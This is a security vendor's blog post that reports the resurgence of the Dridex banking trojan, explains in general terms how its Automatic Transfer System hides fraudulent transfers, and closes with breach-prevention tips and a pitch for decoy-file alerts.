Dridex Banking Trojan: Malware Modified to Steal Credit Card Info

Chris Hartwig

Drwpd-metal-trojan-bugs.pngidex’s newest campaign steals credit card information using an Automatic Transfer System (ATS) mechanism. The malware is capable of compromising users’ credentials to hijack an end user session to transfer money directly to fraudulent accounts. Just when you thought Dridex was dead; it rises out of the ashes with a new command and control infrastructure and a new group of cybercriminals running the exploit.

What is an ATS?

An Automatic Transfer System (ATS) is a tool developed by cybercriminals that takes cyberattacks to the next level. Previously malware families like ZeuS and SpyEye used webinject files to modify the websites of their target organization such as banks. A Webinject file is a text file with JavaScript and HTML code that contains the code the cybercriminal wants to inject into the website. With ATS cybercriminals can deplete a victim’s bank account without the victim’s knowledge and it even covers its own tracks. The script runs on the victim’s computer in the background and will initiate a withdrawal transaction and send the funds to a mule account. ATS scripts modify account balances and conceal illegitimate transactions to hide traces of their presence from victims. As long as a system remains infected; its user will not be able to see the illegitimate transactions pulled from their accounts. These infections even inject fraudulent data into online banking sessions, so users don’t suspect anything is wrong. Older methods required cybercriminals to produce false pop-up windows to trick users into providing their own account information, after leading them to believe they were providing their information to a trusted source.

Return of Dridex

A Spanish company called Buguroo was able to exploit a weakness in the Command & Control (C&C) infrastructure to gain insight into how the malware is being spread. The new analysis of the Dridex command and control panel and attack mechanism revealed the malware is being used in a wider range of malicious campaigns and may be under the control of an entirely new set of cybercriminals. It was believed that the Dridex operation was broken up in October 2015 by US and UK authorities after the arrest of a Moldovan national in connection with it, immediately following a collaborative effort between law enforcement and private companies. In less than a month, a Dridex resurgence was noticed by several security researchers.

Banking Trojan Targeting Android Devices Can Bypass 2FA

Dridex Upgraded to Steal Credit Card Info

“What we discovered is that the Dridex malware is now being used for banking and credit card theft, and the C&C had an exploitable weakness that is out of character with the level of skill in the rest of the Dridex programming,” says Pablo de la Riva Ferrezuelo, chief technology officer and co-founder of Buguroo. “This is conjecture, but based on our analysis, the implication is that after October’s takedown, someone new seems to be developing Dridex versions.”

“At that rate, ransomware is on pace to be a $1 billion a year crime this year.” - FBI

“The analysis shows that Dridex is no longer being used just to hijack online banking sessions in order to transfer money from a victim’s account to fraudulent accounts,” says Ferrezuelo.

Dridex, known for stealing banking information, is now being used to steal credit card information via an Automatic Transfer System and has been found to distribute the Locky ransomware payload.

Cerber: Ransomware Speaks Bitcoin Demand

CryptoJoker – Ransomware You Can Negotiate With

“Also, we found that victims are being targeted from companies all around the world, including Latin America and Africa,” he says. “This is quite new, as the first versions of Dridex were focused on English-speaking countries like Australia, the UK, and the U.S., mainly.”

Buguroo found that Dridex had compromised systems in over 100 countries and collected credit card information from 900 organizations in 10 weeks. There may be as many as 100 million credit cards compromised.

Exploit Kits Make Hacking Easy

This iteration of Dridex may be new but what isn’t new is the fact that banking Trojans and ransomware continues to evolve and become more malicious as time goes on. Also, more and more cybercriminals are purchasing these attacks as exploit kits, so the number of attacks and successful ransoms continue to rise.  Cybercriminals collected $209 million in the first three months of 2016 by extorting businesses and institutions to pay money to decrypt data on their computer servers.

“At that rate, ransomware is on pace to be a $1 billion a year crime this year” according to an unnamed FBI agent interviewed by CNN. The number "is quite high" because a few people "reported large losses." The agency also said the losses could be larger than previously reported because other costs for the extortions are not yet factored in. Also, many companies choose not to report paying the ransom, so those payments are not included.  

How to Prevent a BreachWPD-trojan-with-sword.jpg

There are a number of things you can do today to prevent malicious software like banking Trojans and ransomware from entering your network.

Employee Education - Have frequent reviews with employees discussing the threat of phishing attempts and what to look for in emails to avoid getting compromised. 

How Many of Your Employees Will Get Phished Today?

Gone Phishing: Why Human Resources is Vulnerable to Crypto Ransomware Attacks

Run nightly backups - Backups won’t save you from all the hassles of banking Trojans but can be useful to restore data from a ransomware attack.

Advanced Endpoint Protection – Use to detect suspicious behavior that signature-based solutions miss.

Deploy WatchPoints: "WatchPoints" are files placed on your network to lure attackers who have breached your defenses. For example, one WatchPoint offered is a Microsoft Word document that alerts you when it is accessed. The idea is to give it a very attractive title like “Sensitive Passwords.docx” to tempt the cybercriminals. If the document is retrieved, you and the WatchPoint team automatically receive a notification.

Contact us to see how a simple WatchPoint sensor disguised as a Microsoft Word file works.  When someone opens the document, you will get an email alert. 

Try It!


Other Articles You Will Enjoy!

How to Safely Download Software

When Failure to Act Results in a Compromised Network – A Sad Cryptolocker Tale

New Banking Trojans Emerge with the Death of the Dyre Virus

Share this:

Entrepreneur Link



Subscribe to Email Updates

Recent Posts

Posts by Topic

see all